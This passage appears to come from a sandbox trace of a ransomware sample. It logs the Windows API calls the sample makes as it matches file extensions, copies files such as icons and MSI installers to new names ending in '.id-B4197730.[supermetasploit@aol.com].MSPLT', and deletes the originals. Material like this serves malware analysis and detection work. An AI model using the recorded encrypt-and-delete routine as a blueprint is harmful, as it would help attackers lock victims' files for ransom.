lpString2=".ico") returned -1 [0173.006] lstrlenW (lpString=".docx") returned 5 [0173.006] lstrcmpiW (lpString1=".docx", lpString2="5.ico") returned -1 [0173.006] lstrlenW (lpString=".pdf") returned 4 [0173.006] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.006] lstrlenW (lpString=".xls") returned 4 [0173.006] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.006] lstrlenW (lpString=".xlsx") returned 5 [0173.006] lstrcmpiW (lpString1=".xlsx", lpString2="5.ico") returned -1 [0173.006] lstrlenW (lpString=".ppt") returned 4 [0173.006] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.006] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.006] lstrlenW (lpString=".zip") returned 4 [0173.006] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.006] lstrlenW (lpString=".rar") returned 4 [0173.006] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.006] lstrlenW (lpString=".bz2") returned 4 [0173.006] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0173.006] lstrlenW (lpString=".7z") returned 3 [0173.006] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.006] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.006] lstrlenW (lpString=".dbf") returned 4 [0173.006] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.006] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.006] lstrlenW (lpString=".1cd") returned 4 [0173.006] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.006] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.006] lstrlenW (lpString=".jpg") returned 4 [0173.006] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.006] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0173.007] lstrlenW (lpString="Rotate6.ico") returned 11 [0173.007] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0173.007] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=894) returned 1 [0173.007] CloseHandle (hObject=0x2e8) returned 1 [0173.007] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico")) returned 0x80 [0173.007] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.007] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0173.007] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.007] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.008] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0173.008] GetLastError () returned 0x0 [0173.008] ReadFile (in: hFile=0x2e8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x37e, lpOverlapped=0x0) returned 1 [0173.936] WriteFile (in: hFile=0x2d4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x380, lpOverlapped=0x0) returned 1 [0173.937] ReadFile (in: hFile=0x2e8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0173.937] WriteFile (in: hFile=0x2d4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xea, lpOverlapped=0x0) returned 1 [0173.937] SetEndOfFile (hFile=0x2d4) returned 1 [0173.974] CloseHandle (hObject=0x2d4) returned 1 [0173.975] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.975] SetEndOfFile (hFile=0x2e8) returned 1 [0173.976] CloseHandle (hObject=0x2e8) returned 1 [0173.976] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0173.977] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico")) returned 1 [0173.977] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.978] lstrlenW (lpString=".doc") returned 4 [0173.978] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0173.978] lstrlenW (lpString=".docx") returned 5 [0173.978] lstrcmpiW (lpString1=".docx", lpString2="6.ico") returned -1 [0173.978] lstrlenW (lpString=".pdf") returned 4 [0173.978] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.978] lstrlenW (lpString=".xls") returned 4 [0173.978] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.978] lstrlenW (lpString=".xlsx") returned 5 [0173.978] lstrcmpiW (lpString1=".xlsx", lpString2="6.ico") returned -1 [0173.978] lstrlenW (lpString=".ppt") returned 4 [0173.978] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.978] lstrlenW (lpString=".zip") returned 4 [0173.978] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.978] lstrlenW (lpString=".rar") returned 4 [0173.978] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.978] lstrlenW (lpString=".bz2") returned 4 [0173.978] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0173.978] lstrlenW (lpString=".7z") returned 3 [0173.978] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.978] lstrlenW (lpString=".dbf") returned 4 [0173.978] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.978] lstrlenW (lpString=".1cd") returned 4 [0173.978] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.979] lstrlenW (lpString=".jpg") returned 4 [0173.979] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.979] lstrlenW (lpString=".doc") returned 4 [0173.979] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0173.979] lstrlenW (lpString=".docx") returned 5 [0173.979] lstrcmpiW (lpString1=".docx", lpString2="6.ico") returned -1 [0173.979] lstrlenW (lpString=".pdf") returned 4 [0173.979] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.979] lstrlenW (lpString=".xls") returned 4 [0173.979] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.979] lstrlenW (lpString=".xlsx") returned 5 [0173.979] lstrcmpiW (lpString1=".xlsx", lpString2="6.ico") returned -1 [0173.979] lstrlenW (lpString=".ppt") returned 4 [0173.979] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.979] lstrlenW (lpString=".zip") returned 4 [0173.979] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.979] lstrlenW (lpString=".rar") returned 4 [0173.979] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.979] lstrlenW (lpString=".bz2") returned 4 [0173.979] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0173.979] lstrlenW (lpString=".7z") returned 3 [0173.979] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.980] lstrlenW (lpString=".dbf") returned 4 [0173.980] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.980] lstrlenW (lpString=".1cd") returned 4 [0173.980] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0173.980] lstrlenW (lpString=".jpg") returned 4 [0173.980] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.980] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0173.980] lstrlenW (lpString="Setup.ico") returned 9 [0173.980] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0174.396] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=36710) returned 1 [0174.396] CloseHandle (hObject=0x2e8) returned 1 [0174.396] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico")) returned 0x80 [0174.396] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.396] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0174.397] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.397] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.397] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.397] GetLastError () returned 0x0 [0174.397] ReadFile (in: hFile=0x2e8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x8f66, lpOverlapped=0x0) returned 1 [0174.468] WriteFile (in: hFile=0x348, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x8f70, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x8f70, lpOverlapped=0x0) returned 1 [0174.470] ReadFile (in: hFile=0x2e8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0174.470] WriteFile (in: hFile=0x348, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xe6, lpOverlapped=0x0) returned 1 [0174.470] SetEndOfFile (hFile=0x348) returned 1 [0174.470] CloseHandle (hObject=0x348) returned 1 [0174.476] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.476] SetEndOfFile (hFile=0x2e8) returned 1 [0174.477] CloseHandle (hObject=0x2e8) returned 1 [0174.477] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0174.478] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico")) returned 1 [0174.478] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.478] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.478] lstrlenW (lpString=".doc") returned 4 [0174.478] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.478] lstrlenW (lpString=".docx") returned 5 [0174.478] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0174.478] lstrlenW (lpString=".pdf") returned 4 [0174.478] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.478] lstrlenW (lpString=".xls") returned 4 [0174.478] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.478] lstrlenW (lpString=".xlsx") returned 5 [0174.478] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0174.479] lstrlenW (lpString=".ppt") returned 4 [0174.479] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.479] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.479] lstrlenW (lpString=".zip") returned 4 [0174.479] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.479] lstrlenW (lpString=".rar") returned 4 [0174.479] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.479] lstrlenW (lpString=".bz2") returned 4 [0174.479] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.479] lstrlenW (lpString=".7z") returned 3 [0174.479] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.479] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.479] lstrlenW (lpString=".dbf") returned 4 [0174.479] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.479] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.479] lstrlenW (lpString=".1cd") returned 4 [0174.479] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.479] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.479] lstrlenW (lpString=".jpg") returned 4 [0174.479] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.480] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.480] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.480] lstrlenW (lpString=".doc") returned 4 [0174.480] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.480] lstrlenW (lpString=".docx") returned 5 [0174.480] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0174.480] lstrlenW (lpString=".pdf") returned 4 [0174.480] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.480] lstrlenW (lpString=".xls") returned 4 [0174.480] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.480] lstrlenW (lpString=".xlsx") returned 5 [0174.480] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0174.480] lstrlenW (lpString=".ppt") returned 4 [0174.480] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.480] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.480] lstrlenW (lpString=".zip") returned 4 [0174.480] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.480] lstrlenW (lpString=".rar") returned 4 [0174.480] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.480] lstrlenW (lpString=".bz2") returned 4 [0174.480] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.480] lstrlenW (lpString=".7z") returned 3 [0174.480] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.480] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.480] lstrlenW (lpString=".dbf") returned 4 [0174.480] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.480] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.480] lstrlenW (lpString=".1cd") returned 4 [0174.480] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.480] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0174.481] lstrlenW (lpString=".jpg") returned 4 [0174.481] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.481] lstrcmpiW (lpString1=".msi", lpString2=".MSPLT") returned -1 [0174.481] lstrlenW (lpString="netfx_Core_x86.msi") returned 18 [0174.481] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.497] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=1163264) returned 1 [0174.497] CloseHandle (hObject=0x374) returned 1 [0174.497] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi")) returned 0x80 [0174.497] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.497] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.497] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.497] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.497] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0174.498] GetLastError () returned 0x0 [0174.498] ReadFile (in: hFile=0x374, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0174.998] WriteFile (in: hFile=0x36c, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0175.037] ReadFile (in: hFile=0x374, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x1c010, lpOverlapped=0x0) returned 1 [0175.454] WriteFile (in: hFile=0x36c, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x1c020, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x1c020, lpOverlapped=0x0) returned 1 [0175.460] ReadFile (in: hFile=0x374, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0175.460] WriteFile (in: hFile=0x36c, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0175.460] SetEndOfFile (hFile=0x36c) returned 1 [0175.460] CloseHandle (hObject=0x36c) returned 1 [0175.866] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.866] SetEndOfFile (hFile=0x374) returned 1 [0175.867] CloseHandle (hObject=0x374) returned 1 [0175.867] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0175.868] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi")) returned 1 [0175.868] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.868] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.868] lstrlenW (lpString=".doc") returned 4 [0175.868] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0175.868] lstrlenW (lpString=".docx") returned 5 [0175.868] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0175.868] lstrlenW (lpString=".pdf") returned 4 [0175.868] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0175.868] lstrlenW (lpString=".xls") returned 4 [0175.868] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0175.868] lstrlenW (lpString=".xlsx") returned 5 [0175.868] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0175.868] lstrlenW (lpString=".ppt") returned 4 [0175.868] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0175.868] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.869] lstrlenW (lpString=".zip") returned 4 [0175.869] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0175.869] lstrlenW (lpString=".rar") returned 4 [0175.869] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0175.869] lstrlenW (lpString=".bz2") returned 4 [0175.869] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0175.869] lstrlenW (lpString=".7z") returned 3 [0175.869] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0175.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.869] lstrlenW (lpString=".dbf") returned 4 [0175.869] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0175.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.869] lstrlenW (lpString=".1cd") returned 4 [0175.869] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0175.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.869] lstrlenW (lpString=".jpg") returned 4 [0175.869] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0175.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.869] lstrlenW (lpString=".doc") returned 4 [0175.869] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0175.869] lstrlenW (lpString=".docx") returned 5 [0175.869] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0175.869] lstrlenW (lpString=".pdf") returned 4 [0175.869] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0175.869] lstrlenW (lpString=".xls") returned 4 [0175.869] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0175.869] lstrlenW (lpString=".xlsx") returned 5 [0175.869] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0175.869] lstrlenW (lpString=".ppt") returned 4 [0175.869] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0175.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.869] lstrlenW (lpString=".zip") returned 4 [0175.869] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0175.869] lstrlenW (lpString=".rar") returned 4 [0175.869] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0175.870] lstrlenW (lpString=".bz2") returned 4 [0175.870] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0175.870] lstrlenW (lpString=".7z") returned 3 [0175.870] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0175.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.870] lstrlenW (lpString=".dbf") returned 4 [0175.870] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0175.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.870] lstrlenW (lpString=".1cd") returned 4 [0175.870] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0175.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0175.870] lstrlenW (lpString=".jpg") returned 4 [0175.870] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0175.870] lstrcmpiW (lpString1=".msi", lpString2=".MSPLT") returned -1 [0175.870] lstrlenW (lpString="netfx_Extended_x86.msi") returned 22 [0175.870] CreateFileW 